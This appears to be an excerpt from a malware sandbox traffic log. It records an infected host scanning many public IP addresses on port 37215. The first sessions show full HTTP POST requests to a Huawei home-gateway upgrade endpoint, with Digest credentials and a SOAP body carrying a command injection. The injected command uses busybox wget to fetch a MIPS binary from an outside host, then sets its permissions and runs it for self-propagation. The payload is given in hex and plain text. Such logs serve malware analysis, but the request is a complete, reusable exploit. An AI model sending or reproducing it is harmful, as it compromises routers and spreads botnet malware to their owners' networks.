2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2455192.168.2.1532794157.44.99.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:34.409467936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2456192.168.2.1560696197.240.101.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:34.426805973 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2457192.168.2.154158041.74.81.1637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:34.426846027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2458192.168.2.155580899.54.28.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2459192.168.2.1560676197.85.96.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2460192.168.2.1556660157.187.174.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2461192.168.2.1553456197.131.27.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2462192.168.2.154821041.95.40.22137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2463192.168.2.1536226197.41.236.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2464192.168.2.1536038197.18.13.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2465192.168.2.1538090197.201.185.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2466192.168.2.153552841.48.41.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2467192.168.2.1556746197.140.29.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2468192.168.2.1547234197.147.121.23537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2469192.168.2.1536110149.181.89.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2470192.168.2.155678441.184.103.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2471192.168.2.1539614157.125.57.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2472192.168.2.1538696136.69.163.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2473192.168.2.1558410197.0.202.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2474192.168.2.1552472157.199.81.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2475192.168.2.155656641.176.164.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2476192.168.2.155785041.190.90.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2477192.168.2.154742641.156.144.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2478192.168.2.154536445.94.64.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2479192.168.2.155025841.235.150.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2480192.168.2.153653441.61.73.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2481192.168.2.1537482197.191.231.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2482192.168.2.1554752197.64.185.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2483192.168.2.1559824204.30.87.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2484192.168.2.1557876197.20.133.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2485192.168.2.153360441.58.166.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2486192.168.2.1560206197.122.180.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2487192.168.2.153887041.218.31.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2488192.168.2.155595841.65.28.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2489192.168.2.1558126157.68.159.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2490192.168.2.1549580136.249.247.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2491192.168.2.154299841.22.12.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2492192.168.2.153623441.16.41.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2493192.168.2.154313041.66.87.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2494192.168.2.1539326197.237.114.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2495192.168.2.153415024.127.182.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2496192.168.2.155975641.93.254.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2497192.168.2.1553604135.195.188.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2498192.168.2.154873241.179.2.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2499192.168.2.15479729.191.65.13037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2500192.168.2.1534238197.183.93.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2501192.168.2.1534556157.34.233.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2502192.168.2.1545882194.203.238.8337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2503192.168.2.1551966197.100.152.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2504192.168.2.1556316157.161.146.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2505192.168.2.154275876.85.32.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2506192.168.2.153699269.11.37.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2507192.168.2.154471841.209.238.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2508192.168.2.1537076157.109.23.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2509192.168.2.154441464.67.228.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2510192.168.2.155067241.164.189.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2511192.168.2.1559988197.41.225.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2512192.168.2.154088865.9.194.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2513192.168.2.1559400157.89.199.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2514192.168.2.1554292157.37.112.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2515192.168.2.1540366157.111.187.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2516192.168.2.1546892197.2.26.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2517192.168.2.1557452197.15.87.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2518192.168.2.1553326157.86.167.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2519192.168.2.154017241.236.232.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2520192.168.2.153852641.149.219.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2521192.168.2.1560832197.71.75.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2522192.168.2.1557128197.200.47.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2523192.168.2.1558664157.239.91.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2524192.168.2.154929441.149.203.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2525192.168.2.155165641.205.203.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2526192.168.2.1549700197.175.234.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2527192.168.2.1541626157.11.240.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2528192.168.2.155343895.245.132.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2529192.168.2.15385028.175.99.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2530192.168.2.155791880.63.162.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2531192.168.2.156013441.184.102.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2532192.168.2.1547272113.11.17.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2533192.168.2.1538070197.184.100.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2534192.168.2.1558086197.172.180.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2535192.168.2.1535458119.224.4.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2536192.168.2.154961441.92.156.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2537192.168.2.1536124188.196.11.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2538192.168.2.1543424114.253.5.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2539192.168.2.1551190197.252.127.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2540192.168.2.1557588197.161.80.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2541192.168.2.155695641.153.2.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2542192.168.2.1550932192.7.8.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2543192.168.2.1560464157.3.164.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2544192.168.2.1535326221.196.17.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2545192.168.2.1547556197.68.226.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2546192.168.2.154281641.160.251.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2547192.168.2.1553520197.205.159.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2548192.168.2.154471480.162.118.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2549192.168.2.1543792154.43.132.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2550192.168.2.1556238157.218.147.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2551192.168.2.155954841.29.239.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2552192.168.2.153340441.151.230.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2553192.168.2.1547510157.52.168.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2554192.168.2.1554432146.243.102.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2555192.168.2.1548680197.165.196.1537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2556192.168.2.1553984201.169.183.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2557192.168.2.154485014.145.88.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2558192.168.2.1552878197.248.81.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2559192.168.2.1557146107.156.209.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2560192.168.2.155439841.120.171.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2561192.168.2.1552810197.77.103.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2562192.168.2.1555140207.142.231.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2563192.168.2.1544188157.36.12.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2564192.168.2.1542524157.17.243.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2565192.168.2.1532810157.3.6.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2566192.168.2.1553992197.48.216.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2567192.168.2.155818641.224.190.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2568192.168.2.1544036157.199.209.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2569192.168.2.1557640197.147.27.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2570192.168.2.155758841.91.118.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2571192.168.2.1534394155.38.187.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2572192.168.2.1557524197.216.82.25537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2573192.168.2.1548022202.185.249.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2574192.168.2.1537254157.251.24.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2575192.168.2.1543836167.92.168.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2576192.168.2.1540106145.138.142.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2577192.168.2.1543380157.156.96.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2578192.168.2.155511236.228.47.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2579192.168.2.1545640197.216.251.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2580192.168.2.1539834163.114.170.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2581192.168.2.1533426197.130.186.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2582192.168.2.153889641.51.128.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2583192.168.2.154214041.59.108.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2584192.168.2.155074441.201.94.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2585192.168.2.1552282157.198.223.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2586192.168.2.1542002157.79.147.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2587192.168.2.154582041.53.209.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2588192.168.2.1537580197.56.204.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2589192.168.2.1548022157.17.50.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2590192.168.2.153977641.132.186.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2591192.168.2.1549694197.107.139.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2592192.168.2.1544622157.22.34.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2593192.168.2.1534356157.219.144.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2594192.168.2.1553426197.214.78.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2595192.168.2.1554282197.58.112.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2596192.168.2.154999841.138.204.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2597192.168.2.154032841.125.133.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2598192.168.2.155762641.162.175.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2599192.168.2.1544250157.215.58.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2600192.168.2.1543606197.87.224.20937215
                                                          TimestampBytes transferredDirectionData


